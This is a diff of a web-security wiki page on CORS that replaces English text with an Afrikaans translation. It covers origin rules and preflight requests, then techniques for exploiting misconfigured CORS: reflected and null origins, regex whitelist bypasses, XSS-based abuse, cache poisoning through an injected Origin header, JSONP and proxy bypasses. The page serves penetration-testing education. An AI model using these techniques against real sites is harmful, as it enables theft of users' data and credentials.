+'n **Selfde-oorsprong**-beleid vereis dat 'n **bediener wat 'n bron aanvra** en die bediener wat die **bron herberg** dieselfde protokol (bv. `http://`), domeinnaam (bv. `internal-web.com`), en **poort** (bv. 80) deel. Onder hierdie beleid word slegs webbladsye van dieselfde domein en poort toegelaat om toegang tot die bronne te verkry.
 
-The application of the same-origin policy in the context of `http://normal-website.com/example/example.html` is illustrated as follows:
+Die toepassing van die selfde-oorsprong-beleid in die konteks van `http://normal-website.com/example/example.html` word as volg geïllustreer:
 
-| URL accessed                              | Access permitted?                  |
+| Geaktiveerde URL                           | Toegang toegelaat?                  |
 | ----------------------------------------- | ---------------------------------- |
-| `http://normal-website.com/example/`      | Yes: Identical scheme, domain, and port |
-| `http://normal-website.com/example2/`     | Yes: Identical scheme, domain, and port |
-| `https://normal-website.com/example/`     | No: Different scheme and port      |
-| `http://en.normal-website.com/example/`   | No: Different domain               |
-| `http://www.normal-website.com/example/`  | No: Different domain               |
-| `http://normal-website.com:8080/example/` | No: Different port*                |
+| `http://normal-website.com/example/`      | Ja: Identiese skema, domein en poort |
+| `http://normal-website.com/example2/`     | Ja: Identiese skema, domein en poort |
+| `https://normal-website.com/example/`     | Nee: Verskillende skema en poort    |
+| `http://en.normal-website.com/example/`   | Nee: Verskillende domein             |
+| `http://www.normal-website.com/example/`  | Nee: Verskillende domein             |
+| `http://normal-website.com:8080/example/` | Nee: Verskillende poort*             |
 
-*Internet Explorer disregards the port number in enforcing the same-origin policy, thus allowing this access.
+*Internet Explorer ignoreer die poortnommer in die afdwinging van die selfde-oorsprong-beleid, wat toegang toelaat.
 
-### `Access-Control-Allow-Origin` Header
+### `Access-Control-Allow-Origin`-kop
 
-This header can allow **multiple origins**, a **`null`** value, or a wildcard **`*`**. However, **no browser supports multiple origins**, and the use of the wildcard `*` is subject to **limitations**. (The wildcard must be used alone, and its use alongside `Access-Control-Allow-Credentials: true` is not permitted.)
+Hierdie kop kan **verskeie oorspronge**, 'n **`null`**-waarde, of 'n wildkaart **`*`** toelaat. Tog ondersteun **geen webblaaier verskeie oorspronge nie**, en die gebruik van die wildkaart `*` is onderhewig aan **beperkings**. (Die wildkaart moet alleen gebruik word, en dit mag nie saam met `Access-Control-Allow-Credentials: true` gebruik word nie.)
 
-This header is **issued by a server** in response to a cross-domain resource request initiated by a website, with the browser automatically adding an `Origin` header.
+Hierdie kop word **deur 'n bediener** uitgereik as antwoord op 'n kruis-domein-bronaanvraag wat deur 'n webwerf geïnisieer word, met die blaaier wat outomaties 'n `Origin`-kop byvoeg.
 
-### `Access-Control-Allow-Credentials` Header
+### `Access-Control-Allow-Credentials`-kop
 
-By **default**, cross-origin requests are made without credentials like cookies or the Authorization header. Yet, a cross-domain server can allow the reading of the response when credentials are sent by setting the `Access-Control-Allow-Credentials` header to **`true`**.
-
-If set to `true`, the browser will transmit credentials (cookies, authorization headers, or TLS client certificates).
+Standaard word kruis-domein-aanvrae sonder geloofsbriewe soos koekies of die Authorization-kop gemaak. Tog kan 'n kruis-domein-bediener die lees van die respons toelaat wanneer geloofsbriewe gestuur word deur die `Access-Control-Allow-Credentials`-kop na **`true`** in te stel.
 
+Indien gestel op `true`, sal die blaaier geloofsbriewe (koekies, outorisasiekoppe of TLS-kliëntsertifikate) oordra.
 ```javascript
 var xhr = new XMLHttpRequest();
 xhr.onreadystatechange = function() {
-    if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
-        console.log(xhr.responseText);
-    }
+if(xhr.readyState === XMLHttpRequest.DONE && xhr.status === 200) {
+console.log(xhr.responseText);
 }
-xhr.open('GET', 'http://example.com/', true); 
-xhr.withCredentials = true; 
+}
+xhr.open('GET', 'http://example.com/', true);
+xhr.withCredentials = true;
 xhr.send(null);
 ```
 
 ```javascript
 fetch(url, {
-  credentials: 'include'  
+credentials: 'include'
 })
 ```
 
@@ -71,19 +70,17 @@ xhr.setRequestHeader('Content-Type', 'application/xml');
 xhr.onreadystatechange = handler;
 xhr.send('Arun');
 ```
+### CSRF Voorafgaande versoek
 
-### CSRF Pre-flight request
+### Begrip van Voorafgaande Versoeke in Kruis-Domein Kommunikasie
 
-### Understanding Pre-flight Requests in Cross-Domain Communication
+Wanneer 'n kruis-domein versoek onder spesifieke omstandighede geïnisieer word, soos die gebruik van 'n **nie-standaard HTTP-metode** (enige iets anders as HEAD, GET, POST), die invoer van nuwe **koppe** of die gebruik van 'n spesiale **Content-Type kopwaarde**, kan 'n voorafgaande versoek vereis word. Hierdie voorlopige versoek, wat die **`OPTIONS`** metode gebruik, dien om die bedoelings van die komende kruis-oorsprong versoek aan die bediener te kommunikeer, insluitend die HTTP-metodes en koppe wat dit van plan is om te gebruik.
 
-When initiating a cross-domain request under specific conditions, such as using a **non-standard HTTP method** (anything other than HEAD, GET, POST), introducing new **headers**, or employing a special **Content-Type header value**, a pre-flight request may be required. This preliminary request, leveraging the **`OPTIONS`** method, serves to inform the server of the forthcoming cross-origin request's intentions, including the HTTP methods and headers it intends to use. 
+Die **Cross-Origin Resource Sharing (CORS)**-protokol vereis hierdie voorafgaande kontrole om die uitvoerbaarheid van die versoekte kruis-oorsprong operasie te bepaal deur die toegelate metodes, koppe en die betroubaarheid van die oorsprong te verifieer. Vir 'n gedetailleerde begrip van watter omstandighede die behoefte aan 'n voorafgaande versoek omseil, raadpleeg die omvattende gids wat deur [**Mozilla Developer Network (MDN)**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests) verskaf word.
 
-The **Cross-Origin Resource Sharing (CORS)** protocol mandates this pre-flight check to determine the feasibility of the requested cross-origin operation by verifying the allowed methods, headers, and the trustworthiness of the origin. For a detailed understanding of what conditions circumvent the need for a pre-flight request, refer to the comprehensive guide provided by [**Mozilla Developer Network (MDN)**](https://developer.mozilla.org/en-US/docs/Web/HTTP/CORS#simple_requests).
-
-It's crucial to note that the **absence of a pre-flight request does not negate the requirement for the response to carry authorization headers**. Without these headers, the browser is incapacitated in its ability to process the response from the cross-origin request.
-
-Consider the following illustration of a pre-flight request aimed at employing the `PUT` method along with a custom header named `Special-Request-Header`:
+Dit is belangrik om daarop te let dat die **afwesigheid van 'n voorafgaande versoek nie die vereiste vir die respons om outorisasie-koppe te dra, ontkrag nie**. Sonder hierdie koppe is die webblaaier nie in staat om die respons van die kruis-oorsprong versoek te verwerk nie.
 
+Oorweeg die volgende illustrasie van 'n voorafgaande versoek wat daarop gemik is om die `PUT`-metode saam met 'n aangepaste kop genaamd `Special-Request-Header` te gebruik:
 ```
 OPTIONS /info HTTP/1.1
 Host: example2.com
@@ -92,9 +89,7 @@ Origin: https://example.com
 Access-Control-Request-Method: POST
 Access-Control-Request-Headers: Authorization
 ```
-
-In response, the server might return headers indicating the accepted methods, the allowed origin, and other CORS policy details, as shown below:
-
+In reaksie kan die bediener koppele terugstuur wat die aanvaarde metodes, die toegelate oorsprong en ander CORS-beleidsbesonderhede aandui, soos hieronder getoon:
 ```markdown
 HTTP/1.1 204 No Content
 ...
@@ -104,26 +99,23 @@ Access-Control-Allow-Headers: Authorization
 Access-Control-Allow-Credentials: true
 Access-Control-Max-Age: 240
 ```
+- **`Access-Control-Allow-Headers`**: Hierdie kop spesifiseer watter koppe gebruik kan word tydens die werklike versoek. Dit word deur die bediener ingestel om die toegelate koppe in versoek van die kliënt aan te dui.
+- **`Access-Control-Expose-Headers`**: Deur hierdie kop gee die bediener aan die kliënt inligting oor watter koppe as deel van die respons blootgestel kan word, behalwe die eenvoudige responskoppe.
+- **`Access-Control-Max-Age`**: Hierdie kop dui aan hoe lank die resultate van 'n voorafgaande versoek in die kas gestoor kan word. Die bediener stel die maksimum tyd, in sekondes, vas wat die inligting wat deur 'n voorafgaande versoek teruggekeer word, hergebruik kan word.
+- **`Access-Control-Request-Headers`**: Hierdie kop word in voorafgaande versoek gestel en deur die kliënt gebruik om die bediener in te lig oor watter HTTP-koppe die kliënt in die werklike versoek wil gebruik.
+- **`Access-Control-Request-Method`**: Hierdie kop, ook in voorafgaande versoek gebruik, word deur die kliënt gestel om aan te dui watter HTTP-metode in die werklike versoek gebruik sal word.
+- **`Origin`**: Hierdie kop word outomaties deur die webblaaier ingestel en dui die oorsprong van die kruis-oorsprong versoek aan. Dit word deur die bediener gebruik om te bepaal of die inkomende versoek toegelaat of geweier moet word op grond van die CORS-beleid.
 
-- **`Access-Control-Allow-Headers`**: This header specifies which headers can be used during the actual request. It is set by the server to indicate the allowed headers in requests from the client.
-- **`Access-Control-Expose-Headers`**: Through this header, the server informs the client about which headers can be exposed as part of the response besides the simple response headers.
-- **`Access-Control-Max-Age`**: This header indicates how long the results of a pre-flight request can be cached. The server sets the maximum time, in seconds, that the information returned by a pre-flight request may be reused.
-- **`Access-Control-Request-Headers`**: Used in pre-flight requests, this header is set by the client to inform the server about which HTTP headers the client wants to use in the actual request.
-- **`Access-Control-Request-Method`**: This header, also used in pre-flight requests, is set by the client to indicate which HTTP method will be used in the actual request.
-- **`Origin`**: This header is automatically set by the browser and indicates the origin of the cross-origin request. It is used by the server to assess whether the incoming request should be allowed or denied based on the CORS policy.
+Let daarop dat gewoonlik (afhangende van die inhoudstipe en koppe wat ingestel is) in 'n **GET/POST-versoek geen voorafgaande versoek gestuur word** (die versoek word **direk** gestuur), maar as jy toegang wil hê tot die **koppe/liggaam van die respons**, moet dit 'n _Access-Control-Allow-Origin_ kop bevat wat dit toelaat.\
+**Daarom beskerm CORS nie teen CSRF nie (maar dit kan nuttig wees).**
 
+### **Voorafgaande versoek vir plaaslike netwerkversoeke**
 
-Note that usually (depending on the content-type and headers set) in a **GET/POST request no pre-flight request is sent** (the request is sent **directly**), but if you want to access the **headers/body of the response**, it must contains an _Access-Control-Allow-Origin_ header allowing it.\
-**Therefore, CORS doesn't protect against CSRF (but it can be helpful).**
+1. **`Access-Control-Request-Local-Network`**: Hierdie kop word ingesluit in die versoek van die kliënt om aan te dui dat die navraag gerig is op 'n plaaslike netwerkbron. Dit dien as 'n merker om die bediener in te lig dat die versoek afkomstig is van binne die plaaslike netwerk.
 
-### **Local Network Requests Pre-flight request**
-
-1. **`Access-Control-Request-Local-Network`**: This header is included in the client's request to signify that the inquiry is aimed at a local network resource. It serves as a marker to inform the server that the request originates from within the local network.
-
-2. **`Access-Control-Allow-Local-Network`**: In response, servers utilize this header to communicate that the requested resource is permitted to be shared with entities outside of the local network. It acts as a green light for sharing resources across different network boundaries, ensuring controlled access while maintaining security protocols.
-
-A **valid response allowing the local network request** needs to have also in the response the header `Access-Controls-Allow-Local_network: true` :
+2. **`Access-Control-Allow-Local-Network`**: In reaksie gebruik bedieners hierdie kop om te kommunikeer dat die versoekte bron toegelaat word om gedeel te word met entiteite buite die plaaslike netwerk. Dit dien as 'n groen lig vir die deling van hulpbronne oor verskillende netwerkgrense, terwyl beheerde toegang en sekuriteitsprotokolle gehandhaaf word.
 
+'n **Geldige respons wat die plaaslike netwerkversoek toelaat**, moet ook die kop `Access-Controls-Allow-Local_network: true` in die respons hê:
 ```
 HTTP/1.1 200 OK
 ...
@@ -134,139 +126,127 @@ Access-Control-Allow-Local-Network: true
 Content-Length: 0
 ...
 ```
-
 {% hint style="warning" %}
-Note that the linux **0.0.0.0** IP works to **bypass** these requirements to access localhost as that IP address is not considered "local".
+Let daarop dat die linux **0.0.0.0** IP gebruik kan word om hierdie vereistes te **omseil** om toegang tot die localhost te verkry, aangesien daardie IP-adres nie as "plaaslik" beskou word nie.
 
-It's also possible to **bypass the Local Network requirements** if you use the **public IP address of a local endpoint** (like the public IP of the router). Because in several occations, even if the **public IP** is being accessed, if it's **from the local network**, access will be granted.
+Dit is ook moontlik om die vereistes van die plaaslike netwerk te **omseil** as jy die **openbare IP-adres van 'n plaaslike eindpunt** gebruik (soos die openbare IP van die router). Want in verskeie gevalle, selfs as die **openbare IP** benader word, as dit **van die plaaslike netwerk** af is, sal toegang verleen word.
 
 
 {% endhint %}
 
-## Exploitable misconfigurations
+## Uitbuitbare verkeerde konfigurasies
 
-It has been observed that the setting of `Access-Control-Allow-Credentials` to **`true`** is a prerequisite for most **real attacks**. This setting permits the browser to send credentials and read the response, enhancing the attack's effectiveness. Without this, the benefit of making a browser issue a request over doing it oneself diminishes, as leveraging a user's cookies becomes unfeasible.
+Daar is waargeneem dat die instelling van `Access-Control-Allow-Credentials` op **`true`** 'n voorvereiste is vir die meeste **werklike aanvalle**. Hierdie instelling maak dit vir die blaaier moontlik om geloofsbriewe te stuur en die respons te lees, wat die aanval se doeltreffendheid verbeter. Sonder dit verminder die voordeel van 'n blaaier wat 'n versoek uitreik in plaas daarvan om dit self te doen, aangesien dit onprakties word om 'n gebruiker se koekies te benut.
 
-### Exception: Exploiting Network Location as Authentication
+### Uitsondering: Uitbuiting van Netwerklokasie as Verifikasie
 
-An exception exists where the victim's network location acts as a form of authentication. This allows for the victim's browser to be used as a proxy, circumventing IP-based authentication to access intranet applications. This method shares similarities in impact with DNS rebinding but is simpler to exploit.
+Daar is 'n uitsondering waar die slagoffer se netwerklokasie as 'n vorm van verifikasie optree. Dit maak dit moontlik vir die slagoffer se blaaier om as 'n proksi gebruik te word, wat IP-gebaseerde verifikasie omseil om toegang tot intranettoepassings te verkry. Hierdie metode het ooreenkomste met DNS-herbinding wat impak betref, maar is makliker om uit te buit.
 
-### Reflection of `Origin` in `Access-Control-Allow-Origin`
-
-The real-world scenario where the `Origin` header's value is reflected in `Access-Control-Allow-Origin` is theoretically improbable due to restrictions on combining these headers. However, developers seeking to enable CORS for multiple URLs may dynamically generate the `Access-Control-Allow-Origin` header by copying the `Origin` header's value. This approach can introduce vulnerabilities, particularly when an attacker employs a domain with a name designed to appear legitimate, thereby deceiving the validation logic.
+### Weerspieëling van `Origin` in `Access-Control-Allow-Origin`
 
+Die werklike scenario waar die waarde van die `Origin`-kop in `Access-Control-Allow-Origin` weerspieël word, is teoreties onwaarskynlik as gevolg van beperkings op die kombinasie van hierdie koppe. Tog kan ontwikkelaars wat CORS vir verskeie URL's wil aktiveer, die `Access-Control-Allow-Origin`-kop dinamies genereer deur die waarde van die `Origin`-kop te kopieer. Hierdie benadering kan kwesbaarhede inbring, veral wanneer 'n aanvaller 'n domein met 'n naam gebruik wat ontwerp is om legitiem te lyk en sodoende die valideringslogika te mislei.
 ```html
 
 ```
+### Uitbuiting van die `null` Oorsprong
 
-### Exploiting the `null` Origin
-
-The `null` origin, specified for situations like redirects or local HTML files, holds a unique position. Some applications whitelist this origin to facilitate local development, inadvertently allowing any website to mimic a `null` origin through a sandboxed iframe, thus bypassing CORS restrictions.
-
+Die `null` oorsprong, wat gespesifiseer word vir situasies soos omleidings of plaaslike HTML-lêers, het 'n unieke posisie. Sommige toepassings lys hierdie oorsprong op om plaaslike ontwikkeling te fasiliteer, sonder om te besef dat enige webwerf 'n `null` oorsprong kan naboots deur middel van 'n gesandbokste ifram, en sodoende CORS-beperkings omseil.
 ```html
 
 ```
 
 ```html
 
 ```
+### Gereelde Uitdrukkings Bypass Tegnieke
 
-### Regular Expression Bypass Techniques
+Wanneer jy te doen kry met 'n domein witlys, is dit noodsaaklik om te toets vir omseilingsgeleenthede, soos die byvoeging van die aanvaller se domein by 'n witgelyste domein of die uitbuiting van subdomein-oorgeneemde kwesbaarhede. Daarbenewens kan gereelde uitdrukkings wat gebruik word vir domeinvalidering, subtiliteite in domeinnaamkonvensies oorsien, wat verdere omseilingsgeleenthede bied.
 
-When encountering a domain whitelist, it's crucial to test for bypass opportunities, such as appending the attacker's domain to a whitelisted domain or exploiting subdomain takeover vulnerabilities. Additionally, regular expressions used for domain validation may overlook nuances in domain naming conventions, presenting further bypass opportunities.
+### Gevorderde Gereelde Uitdrukkings Omseilings
 
-### Advanced Regular Expression Bypasses
+Gereelde uitdrukkingspatrone fokus tipies op alfanumeriese, punt (.) en strepies (-) karakters, waarby ander moontlikhede oor die hoof gesien word. Byvoorbeeld, 'n domeinnaam wat ontwerp is om karakters in te sluit wat deur webblaaier en gereelde uitdrukkingspatrone verskillend geïnterpreteer word, kan sekuriteitskontroles omseil. Safari, Chrome en Firefox se hantering van onderstrepingskarakters in subdomeine illustreer hoe sulke verskille benut kan word om domeinvalideringslogika te omseil.
 
-Regex patterns typically concentrate on alphanumeric, dot (.), and hyphen (-) characters, neglecting other possibilities. For example, a domain name crafted to include characters interpreted differently by browsers and regex patterns can bypass security checks. Safari, Chrome, and Firefox's handling of underscore characters in subdomains illustrates how such discrepancies can be exploited to circumvent domain validation logic.
-
-**For more information and settings of this bypass check:** [**https://www.corben.io/advanced-cors-techniques/**](https://www.corben.io/advanced-cors-techniques/) **and** [**https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397**](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)
+**Vir meer inligting en instellings van hierdie omseilingstoets:** [**https://www.corben.io/advanced-cors-techniques/**](https://www.corben.io/advanced-cors-techniques/) **en** [**https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397**](https://medium.com/bugbountywriteup/think-outside-the-scope-advanced-cors-exploitation-techniques-dad019c68397)
 
 ![https://miro.medium.com/v2/resize:fit:720/format:webp/1*rolEK39-DDxeBgSq6KLKAA.png](<../.gitbook/assets/image (153).png>)
 
-### From XSS inside a subdomain
+### Vanaf XSS binne 'n subdomein
 
-Developers often implement defensive mechanisms to protect against CORS exploitation by whitelisting domains that are permitted to request information. Despite these precautions, the system's security is not foolproof. The presence of even a single vulnerable subdomain within the whitelisted domains can open the door to CORS exploitation through other vulnerabilities, such as XSS (Cross-Site Scripting).
-
-To illustrate, consider the scenario where a domain, `requester.com`, is whitelisted to access resources from another domain, `provider.com`. The server-side configuration might look something like this:
+Ontwikkelaars implementeer dikwels verdedigingsmeganismes om te beskerm teen CORS-uitbuiting deur domeine wat toegelaat word om inligting aan te vra, op 'n witlys te plaas. Ten spyte van hierdie voorbehoud is die stelsel se sekuriteit nie waterdig nie. Die teenwoordigheid van selfs 'n enkele kwesbare subdomein binne die witgelyste domeine kan die deur oopmaak vir CORS-uitbuiting deur ander kwesbaarhede, soos XSS (Cross-Site Scripting).
 
+Om dit te illustreer, oorweeg die scenario waar 'n domein, `requester.com`, op die witlys geplaas word om toegang tot hulpbronne van 'n ander domein, `provider.com`, te verkry. Die bedienerkant-konfigurasie kan iets soos dit lyk:
 ```javascript
 if ($_SERVER['HTTP_HOST'] == '*.requester.com') {
-  // Access data
+// Access data
 } else {
-  // Unauthorized access
+// Unauthorized access
 }
 ```
-
-In this setup, all subdomains of `requester.com` are allowed access. However, if a subdomain, say `sub.requester.com`, is compromised with an XSS vulnerability, an attacker can leverage this weakness. For example, an attacker with access to `sub.requester.com` could exploit the XSS vulnerability to bypass CORS policies and maliciously access resources on `provider.com`.
+In hierdie opset word toegang tot alle subdomeine van `requester.com` toegelaat. As 'n subdomein, byvoorbeeld `sub.requester.com`, egter gekompromitteer word met 'n XSS-gebrek, kan 'n aanvaller hierdie swakheid benut. Byvoorbeeld, 'n aanvaller met toegang tot `sub.requester.com` kan die XSS-gebrek uitbuit om CORS-beleide te omseil en kwaadwillig toegang te verkry tot hulpbronne op `provider.com`.
 
 
-### **Server-side cache poisoning**
+### **Bedienerkant-cachevergiftiging**
 
-**[From this research](https://portswigger.net/research/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)**
+**[Vanaf hierdie navorsing](https://portswigger.net/research/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)**
 
-It's possible that by exploiting server-side cache poisoning through HTTP header injection, a stored Cross-Site Scripting (XSS) vulnerability can be induced. This scenario unfolds when an application fails to sanitize the `Origin` header for illegal characters, creating a vulnerability particularly for Internet Explorer and Edge users. These browsers treat `\r` (0x0d) as a legitimate HTTP header terminator, leading to HTTP header injection vulnerabilities.
-
-Consider the following request where the `Origin` header is manipulated:
+Dit is moontlik dat deur bedienerkant-cachevergiftiging te benut deur middel van HTTP-kopinspuiting, 'n gestoorde Cross-Site Scripting (XSS)-gebrek geïnduseer kan word. Hierdie scenario ontvou wanneer 'n toepassing nie die `Origin`-kop vir onwettige karakters sanitiseer nie, wat 'n kwesbaarheid skep, veral vir Internet Explorer- en Edge-gebruikers. Hierdie webblaaier behandel `\r` (0x0d) as 'n legitieme HTTP-kopterminator, wat lei tot HTTP-kopinspuitingskwesbaarhede.
 
+Oorweeg die volgende versoek waar die `Origin`-kop gemanipuleer word:
 ```text
 GET / HTTP/1.1
 Origin: z[0x0d]Content-Type: text/html; charset=UTF-7
 ```
-
-Internet Explorer and Edge interpret the response as:
-
+Internet Explorer en Edge interpreteer die respons as:
 ```text
 HTTP/1.1 200 OK
 Access-Control-Allow-Origin: z
 Content-Type: text/html; charset=UTF-7
 ```
+Terwyl dit nie prakties is om hierdie kwesbaarheid direk uit te buit deur 'n webblaaier 'n verkeerde kop te laat stuur nie, kan 'n gekonstrueerde versoek handmatig gegenereer word met behulp van hulpmiddels soos Burp Suite. Hierdie metode kan lei tot 'n bedienerkant-cache wat die respons stoor en dit onbedoeld aan ander dien. Die gekonstrueerde lading is daarop gemik om die karakterstel van die bladsy te verander na UTF-7, 'n karakterenkodering wat dikwels geassosieer word met XSS-kwesbaarhede as gevolg van sy vermoë om karakters op 'n manier te enkodeer wat as skrips uitgevoer kan word in sekere kontekste.
 
-While directly exploiting this vulnerability by making a web browser send a malformed header is not feasible, a crafted request can be manually generated using tools like Burp Suite. This method could lead to a server-side cache saving the response and inadvertently serving it to others. The crafted payload aims to alter the page's character set to UTF-7, a character encoding often associated with XSS vulnerabilities due to its ability to encode characters in a way that can be executed as script in certain contexts.
+Vir verdere lees oor gestoorde XSS-kwesbaarhede, sien [PortSwigger](https://portswigger.net/web-security/cross-site-scripting/stored).
 
-For further reading on stored XSS vulnerabilities, see [PortSwigger](https://portswigger.net/web-security/cross-site-scripting/stored).
-
-**Note**: The exploitation of HTTP header injection vulnerabilities, particularly through server-side cache poisoning, underscores the critical importance of validating and sanitizing all user-supplied input, including HTTP headers. Always employ a robust security model that includes input validation to prevent such vulnerabilities.
+**Opmerking**: Die uitbuiting van HTTP-kopinspuitingskwesbaarhede, veral deur bedienerkant-cachevergiftiging, beklemtoon die kritieke belangrikheid van die validering en sanitisering van alle gebruikersverskafte insette, insluitend HTTP-koppe. Maak altyd gebruik van 'n robuuste sekuriteitsmodel wat insetvalidering insluit om sulke kwesbaarhede te voorkom.
 
 
-### **Client-Side cache poisoning**
+### **Kliëntkant-cachevergiftiging**
 
-**[From this research](https://portswigger.net/research/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)**
+**[Van hierdie navorsing](https://portswigger.net/research/exploiting-cors-misconfigurations-for-bitcoins-and-bounties)**
 
-In this scenario, an instance of a web page reflecting the contents of a custom HTTP header without proper encoding is observed. Specifically, the web page reflects back the contents included in a `X-User-id` header, which could include malicious JavaScript, as demonstrated by the example where the header contains an SVG image tag designed to execute JavaScript code on load.
+In hierdie scenario word 'n geval van 'n webbladsy waargeneem wat die inhoud van 'n aangepaste HTTP-kop sonder behoorlike enkodering weerspieël. Spesifiek weerspieël die webbladsy die inhoud wat in 'n `X-User-id`-kop ingesluit is, wat kwaadwillige JavaScript kan insluit, soos gedemonstreer deur die voorbeeld waar die kop 'n SVG-beeldtag bevat wat ontwerp is om JavaScript-kode by die laai uit te voer.
 
-Cross-Origin Resource Sharing (CORS) policies allow for the sending of custom headers. However, without the response being directly rendered by the browser due to CORS restrictions, the utility of such an injection might seem limited. The critical point arises when considering the browser's cache behavior. If the `Vary: Origin` header is not specified, it becomes possible for the malicious response to be cached by the browser. Subsequently, this cached response could be rendered directly when navigating to the URL, bypassing the need for direct rendering upon the initial request. This mechanism enhances the reliability of the attack by leveraging client-side caching.
+Cross-Origin Resource Sharing (CORS)-beleide maak die stuur van aangepaste koppe moontlik. Sonder dat die blaaier die respons direk weergee as gevolg van CORS-beperkings, mag die nut van so 'n inspuiting beperk lyk. Die kritieke punt ontstaan wanneer die blaaier se cache-gedrag oorweeg word. As die `Vary: Origin`-kop nie gespesifiseer word nie, word dit moontlik dat die kwaadwillige respons deur die blaaier gestoor kan word. Hierdie gestoorde respons kan vervolgens direk weergegee word wanneer na die URL genavigeer word, sonder die behoefte aan direkte weergawe tydens die aanvanklike versoek. Hierdie meganisme verbeter die betroubaarheid van die aanval deur gebruik te maak van kliëntkant-cache.
 
-To illustrate this attack, a JavaScript example is provided, designed to be executed in the environment of a web page, such as through a JSFiddle. This script performs a simple action: it sends a request to a specified URL with a custom header containing the malicious JavaScript. Upon successful request completion, it attempts to navigate to the target URL, potentially triggering the execution of the injected script if the response has been cached without proper handling of the `Vary: Origin` header.
-
-Here's a summarized breakdown of the JavaScript used to execute this attack:
+Om hierdie aanval te illustreer, word 'n JavaScript-voorbeeld verskaf wat ontwerp is om uitgevoer te word in die omgewing van 'n webbladsy, soos deur 'n JSFiddle. Hierdie skrips voer 'n eenvoudige aksie uit: dit stuur 'n versoek na 'n gespesifiseerde URL met 'n aangepaste kop wat die kwaadwillige JavaScript bevat. Na suksesvolle voltooiing van die versoek, probeer dit na die teiken-URL navigeer, wat moontlik die uitvoering van die ingeslote skrips kan veroorsaak as die respons gestoor is sonder behoorlike hantering van die `Vary: Origin`-kop.
 
+Hier is 'n opsomming van die gebruikte JavaScript om hierdie aanval uit te voer:
 ```html
 
 ```
-
-## Bypass
+## Omsingeling
 
 ### XSSI (Cross-Site Script Inclusion) / JSONP
 
-XSSI, also known as Cross-Site Script Inclusion, is a type of vulnerability that takes advantage of the fact that the Same Origin Policy (SOP) does not apply when including resources using the script tag. This is because scripts need to be able to be included from different domains. This vulnerability allows an attacker to access and read any content that was included using the script tag.
+XSSI, ook bekend as Cross-Site Script Inclusion, is 'n tipe kwesbaarheid wat gebruik maak van die feit dat die Same Origin Policy (SOP) nie van toepassing is wanneer hulpbronne ingesluit word met behulp van die skripsie-etiket nie. Dit is omdat skripsies vanaf verskillende domeine ingesluit moet kan word. Hierdie kwesbaarheid stel 'n aanvaller in staat om toegang te verkry tot enige inhoud wat ingesluit is met behulp van die skripsie-etiket.
 
-This vulnerability becomes particularly significant when it comes to dynamic JavaScript or JSONP (JSON with Padding), especially when ambient-authority information like cookies are used for authentication. When requesting a resource from a different host, the cookies are included, making them accessible to the attacker.
+Hierdie kwesbaarheid word veral belangrik wanneer dit kom by dinamiese JavaScript of JSONP (JSON met Padding), veral wanneer omgewingsgesag-inligting soos koekies gebruik word vir outentisering. Wanneer 'n hulpbron van 'n ander gasheer aangevra word, word die koekies ingesluit, wat dit vir die aanvaller toeganklik maak.
 
-To better understand and mitigate this vulnerability, you can use the BurpSuite plugin available at [https://github.com/kapytein/jsonp](https://github.com/kapytein/jsonp). This plugin can help identify and address potential XSSI vulnerabilities in your web applications.
+Om hierdie kwesbaarheid beter te verstaan en te verminder, kan jy die BurpSuite-inprop gebruik wat beskikbaar is by [https://github.com/kapytein/jsonp](https://github.com/kapytein/jsonp). Hierdie inprop kan help om potensiële XSSI-kwesbaarhede in jou webtoepassings te identifiseer en aan te spreek.
 
-[**Read more about the difefrent types of XSSI and how to exploit them here.**](xssi-cross-site-script-inclusion.md)
+[**Lees meer oor die verskillende tipes XSSI en hoe om dit uit te buit hier.**](xssi-cross-site-script-inclusion.md)
 
-Try to add a **`callback`** **parameter** in the request. Maybe the page was prepared to send the data as JSONP. In that case the page will send back the data with `Content-Type: application/javascript` which will bypass the CORS policy.
+Probeer om 'n **`callback`** **parameter** by die versoek te voeg. Miskien is die bladsy voorberei om die data as JSONP te stuur. In daardie geval sal die bladsy die data terugstuur met `Content-Type: application/javascript`, wat die CORS-beleid sal omseil.
 
 ![](<../.gitbook/assets/image (229).png>)
 
-### Easy (useless?) bypass
+### Maklike (nuttelose?) omsingeling
 
-One way to bypass the `Access-Control-Allow-Origin` restriction is by requesting a web application to make a request on your behalf and send back the response. However, in this scenario, the credentials of the final victim won't be sent as the request is made to a different domain.
+Een manier om die `Access-Control-Allow-Origin`-beperking te omseil, is deur 'n webtoepassing te versoek om 'n versoek namens jou te maak en die respons terug te stuur. In hierdie scenario sal die legitimasie van die finale slagoffer nie gestuur word nie, aangesien die versoek na 'n ander domein gemaak word.
 
-1. [**CORS-escape**](https://github.com/shalvah/cors-escape): This tool provides a proxy that forwards your request along with its headers, while also spoofing the Origin header to match the requested domain. This effectively bypasses the CORS policy. Here's an example usage with XMLHttpRequest:
-   
-2. [**simple-cors-escape**](https://github.com/shalvah/simple-cors-escape): This tool offers an alternative approach to proxying requests. Instead of passing on your request as-is, the server makes its own request with the specified parameters.
+1. [**CORS-escape**](https://github.com/shalvah/cors-escape): Hierdie instrument bied 'n proksi wat jou versoek saam met sy koppe deurstuur, terwyl dit ook die Origin-kopie vervals om ooreen te stem met die versoekte domein. Dit omseil effektief die CORS-beleid. Hier is 'n voorbeeld van gebruik met XMLHttpRequest:
 
-### Iframe + Popup Bypass
+2. [**simple-cors-escape**](https://github.com/shalvah/simple-cors-escape): Hierdie instrument bied 'n alternatiewe benadering tot proksi-versoeke. In plaas daarvan om jou versoek soos dit is deur te gee, maak die bediener sy eie versoek met die gespesifiseerde parameters.
 
-You can **bypass CORS checks** such as `e.origin === window.origin` by **creating an iframe** and **from it opening a new window**. More information in the following page:
+### Iframe + Popup Omsingeling
+
+Jy kan **CORS-toetse omseil**, soos `e.origin === window.origin`, deur 'n ifram te skep en van daar af 'n nuwe venster oop te maak. Meer inligting in die volgende bladsy:
 
 {% content-ref url="xss-cross-site-scripting/iframes-in-xss-and-csp.md" %}
 [iframes-in-xss-and-csp.md](xss-cross-site-scripting/iframes-in-xss-and-csp.md)
